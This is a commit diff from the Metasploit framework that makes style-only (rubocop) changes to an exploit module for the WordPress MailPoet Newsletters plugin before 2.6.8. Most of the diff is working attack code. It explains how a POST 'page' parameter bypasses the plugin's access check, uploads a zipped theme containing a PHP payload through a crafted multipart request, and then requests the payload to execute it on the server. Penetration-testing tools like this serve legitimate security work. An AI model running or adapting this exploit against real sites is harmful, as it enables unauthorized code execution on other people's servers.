Land rapid7#3547 - rubocop changes

wchen-r7 · wchen-r7 · commit aa27af96f450 · 2014-07-21T12:26:51.000-05:00
diff --git a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -1,3 +1,5 @@
+# encoding: UTF-8
+
 ##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -12,7 +14,8 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
+    super(update_info(
+      info,
       'Name'           => 'Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload',
       'Description'    => %q{
           The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.8
@@ -24,7 +27,8 @@ def initialize(info = {})
           a POST variable overwrites a GET variable in the $_REQUEST array. The plugin
           uses $_REQUEST to check for access rights. By setting the POST parameter to
           something not beginning with 'wysija_', the check is bypassed. Wordpress uses
-          the $_GET array to determine the page, so it is not affected by this.
+          the $_GET array to determine the page, so it is not affected by this. The developers
+          applied the fixes to all previous versions too.
       },
       'Author'         =>
         [
@@ -34,14 +38,14 @@ def initialize(info = {})
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ],
-          [ 'URL', 'http://www.mailpoet.com/security-update-part-2/'],
-          [ 'URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php']
+          ['URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html'],
+          ['URL', 'http://www.mailpoet.com/security-update-part-2/'],
+          ['URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php']
         ],
       'Privileged'     => false,
       'Platform'       => ['php'],
       'Arch'           => ARCH_PHP,
-      'Targets'        => [ ['wysija-newsletters < 2.6.8', {}] ],
+      'Targets'        => [['wysija-newsletters < 2.6.8', {}]],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jul 1 2014'))
   end
@@ -58,35 +62,31 @@ def create_zip_file(theme_name, payload_name)
     }
 
     zip_file = Rex::Zip::Archive.new
-    content.each_pair do |name, content|
-      zip_file.add_file(name, content)
+    content.each_pair do |name, con|
+      zip_file.add_file(name, con)
     end
 
     zip_file.pack
   end
 
   def check
     readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wysija-newsletters', 'readme.txt')
-    res = send_request_cgi({
+    res = send_request_cgi(
       'uri'    => readme_url,
       'method' => 'GET'
-    })
+    )
     # no readme.txt present
-    if res.nil? || res.code != 200
-      return Msf::Exploit::CheckCode::Unknown
-    end
+    return Msf::Exploit::CheckCode::Unknown if res.nil? || res.code != 200
 
     # try to extract version from readme
     # Example line:
     # Stable tag: 2.6.6
     version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
 
     # readme present, but no version number
-    if version.nil?
-      return Msf::Exploit::CheckCode::Detected
-    end
+    return Msf::Exploit::CheckCode::Detected if version.nil?
 
-    print_status("#{peer} - Found version #{version} of the plugin")
+    vprint_status("#{peer} - Found version #{version} of the plugin")
 
     if Gem::Version.new(version) < Gem::Version.new('2.6.8')
       return Msf::Exploit::CheckCode::Appears
@@ -108,19 +108,20 @@ def exploit
     data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
     data.add_part('themeupload', nil, nil, 'form-data; name="action"')
     data.add_part('Upload', nil, nil, 'form-data; name="submitter"')
+    # this line bypasses the check implemented in version 2.6.7
     data.add_part(rand_text_alpha(10), nil, nil, 'form-data; name="page"')
     post_data = data.to_s
 
     payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name)
 
     print_status("#{peer} - Uploading payload to #{payload_uri}")
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method'   => 'POST',
       'uri'      => uri,
       'ctype'    => "multipart/form-data; boundary=#{data.bound}",
       'vars_get' => { 'page' => 'wysija_campaigns', 'action' => 'themes' },
       'data'     => post_data
-    })
+    )
 
     if res.nil? || res.code != 302 || res.headers['Location'] != 'admin.php?page=wysija_campaigns&action=themes&reload=1&redirect=1'
       fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
@@ -135,9 +136,9 @@ def exploit
     print_warning("#{peer} - The theme folder #{theme_name} can not be removed. Please delete it manually.")
 
     print_status("#{peer} - Executing payload #{payload_uri}")
-    res = send_request_cgi({
+    send_request_cgi(
       'uri'    => payload_uri,
       'method' => 'GET'
-    })
+    )
   end
 end
